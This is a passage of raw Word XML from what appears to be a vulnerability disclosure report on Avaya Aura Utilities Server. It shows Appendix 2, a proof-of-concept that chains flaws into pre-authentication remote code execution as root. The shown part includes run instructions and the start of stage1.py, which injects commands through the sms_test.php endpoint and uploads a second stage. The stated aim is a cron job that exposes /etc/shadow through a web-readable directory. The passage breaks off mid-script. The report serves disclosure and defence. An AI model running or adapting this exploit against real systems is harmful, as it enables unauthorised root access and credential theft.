          <w:p w14:paraId="7B7F677A" w14:textId="34942B69" w:rsidR="00F3225C" w:rsidRPr="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B3ED7C5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRPr="005B45A1" w:rsidRDefault="00F3225C" w:rsidP="005B45A1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75160D26" w14:textId="65163DFF" w:rsidR="004B1F46" w:rsidRDefault="004B1F46" w:rsidP="004B1F46">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Ref58936618"/>
      <w:r>
        <w:t>Appendix 2: Full Pre-Auth RCE to Root Proof</w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Concept</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="34D66650" w14:textId="2B18A4FB" w:rsidR="0014600F" w:rsidRDefault="0014600F" w:rsidP="004B1F46">
      <w:r>
        <w:t xml:space="preserve">This section presents proof-of-concept code that chains together issues presented in this report that will result in Pre-Authentication Remote Code Execution as root on at least the two versions of Avaya Aura Utilities Server that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has been able to successfully test against. Not all</w:t>
      </w:r>
      <w:r w:rsidR="00D267B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>issues or methods discussed in this report are used</w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t xml:space="preserve"> in this proof-of-concept.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>t is likely that</w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">this chain breaks on other </w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t xml:space="preserve">Avaya Aura Utilities Server </w:t>
      </w:r>
      <w:r>
        <w:t>releases that other issues in this report</w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t xml:space="preserve"> can be utilized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, or slight modifications </w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t xml:space="preserve">can be made </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to this </w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t>code to make it work again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4BDCE" w14:textId="2C592A7F" w:rsidR="0014600F" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0014600F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>The issues that are chained in this exploit are as follows:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref58918130 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234" w:rsidRPr="00F94D6F">
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t xml:space="preserve"> Pre-Authentication Remote Code Execution</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BA1360" w14:textId="114DB0E9" w:rsidR="0014600F" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref59003704 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>4) Application Restriction Bypass via Direct CGI Calls</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243F880" w14:textId="6085DCBF" w:rsidR="0014600F" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref59003335 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>6) Session Forgery Authentication Bypass and Privilege Escalation</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D024E2" w14:textId="4A13483D" w:rsidR="004B1F46" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref59009215 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>9) Root Privilege Escalation via Backup and Restore Feature</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45C63">
        <w:t>-&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317D7445" w14:textId="15A4EFF2" w:rsidR="00B45C63" w:rsidRDefault="00B45C63" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref59005697 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>3) Sensitive File Disclosure and Apache Misconfiguration</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC72492" w14:textId="19C3838B" w:rsidR="0014600F" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49588C67" w14:textId="4AEABD73" w:rsidR="0014600F" w:rsidRPr="0014600F" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Notes on Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A34EC" w14:textId="536F128A" w:rsidR="0014600F" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The code is presented in two stages. The first stage uses the pre-auth RCE to effectively upload and execute the second stage which performs the rest of the attack resulting in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> job that copies /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/shadow to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ where it can be accessed using </w:t>
      </w:r>
      <w:r w:rsidR="00B45C63">
        <w:t>Issue “</w:t>
      </w:r>
      <w:r w:rsidR="00B45C63">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B45C63">
        <w:instrText xml:space="preserve"> REF _Ref59005697 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00B45C63">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00011234">
        <w:t>3) Sensitive File Disclosure and Apache Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="00B45C63">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B45C63">
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="006420A8">
        <w:t xml:space="preserve"> The exploit should clean-up after itself on successful execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29029246" w14:textId="62B25248" w:rsidR="00B45C63" w:rsidRDefault="00B45C63" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0B7F9A" w14:textId="11BCE8D3" w:rsidR="00B45C63" w:rsidRDefault="00B45C63" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>To execute this code, please place the two Python scripts in the same folder. Make sure that the Python Requests library is installed, and then run stage1.py:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45C63" w14:paraId="4A8A1573" w14:textId="77777777" w:rsidTr="00B45C63">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7FA9BBF4" w14:textId="5E4B4E45" w:rsidR="00B45C63" w:rsidRDefault="00B45C63" w:rsidP="00B45C63">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ pip install requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B4ED68F" w14:textId="3AE2EF95" w:rsidR="00B45C63" w:rsidRDefault="00B45C63" w:rsidP="00B45C63">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>$ python stage1.py</w:t>
            </w:r>
            <w:r w:rsidR="009C6E40">
              <w:t xml:space="preserve"> https://avayaauraserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70FB1E90" w14:textId="5815FF22" w:rsidR="00B45C63" w:rsidRDefault="00B45C63" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE99DCE" w14:textId="12E6C8DE" w:rsidR="006420A8" w:rsidRDefault="006420A8" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It should be noted that “stage1.py” has been designed to work in both Python 2 and Python 3, as it is run from the attacker’s computer. “stage2.py” has only been tested in Python 2 (2.6 and 2.7 to be exact), as those are the versions installed on the Avaya Aura Utilities Servers that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FusionX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> could test against. It may be necessary to make minor tweaks to “stage2.py” if newer versions of Utilities Server use Python 3 as the default python interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C906EC6" w14:textId="77777777" w:rsidR="006420A8" w:rsidRDefault="006420A8" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA4A94D" w14:textId="439B45DC" w:rsidR="009C6E40" w:rsidRDefault="009C6E40" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006420A8">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>stage1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3ED2D" w14:textId="77777777" w:rsidR="006420A8" w:rsidRPr="006420A8" w:rsidRDefault="006420A8" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="006420A8" w14:paraId="1BE04BE6" w14:textId="77777777" w:rsidTr="006420A8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="53537771" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>#!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>usr/bin/python</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441A1858" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3824D032" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7753DB0A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6706F668" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import base64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1127E3A7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42553869" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A61FD91" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">from urllib3.exceptions import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>InsecureRequestWarning</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7C499351" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DA57CFE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.packages</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.urllib3.disable_warnings(category=InsecureRequestWarning)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B8EBC6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1139DA0F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>sys.argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) != 2:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736F1DBB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Usage: {0} &lt;https://avayaaurautiltiesserver&gt;".format(sys.argv[0]))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D47630" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>exit(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>-1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C6CE9A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AF0C881" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4248DF8B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>base_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>sys.argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">[1] + ("/" if not </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sys.argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>[1].</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endswith</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>("/") else "")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00B4B9CE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>upload_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>base_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sms_test.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3048D34D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>result_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>base_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/results.txt"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74DF050A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shadow_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>base_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> + "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/shadow"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD154B2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BAAFCDE" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>headers = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29B3A013" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AppleWebKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B10C10E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CCB3336" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A78AC02" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject_template</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = "avaya@127.0.0.1:22</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>&amp;{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>0}|"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="226B9947" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14E3F663" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>with open("stage2.py") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="086FF348" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    data = base64.b64encode(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>f.read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49D4D74A" w14:textId="5D3C2A38" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="682C7C49" w14:textId="2E4FD9FA" w:rsidR="00A07918" w:rsidRDefault="00A07918" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t># Data must be chunked as too big of a value will cause a server error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05540C53" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>chunks = [</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>data[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">i : i + 6000] for i in range(0, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(data), 6000)]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="046988D9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>i = 0</w:t>
            </w:r>
          </w:p>
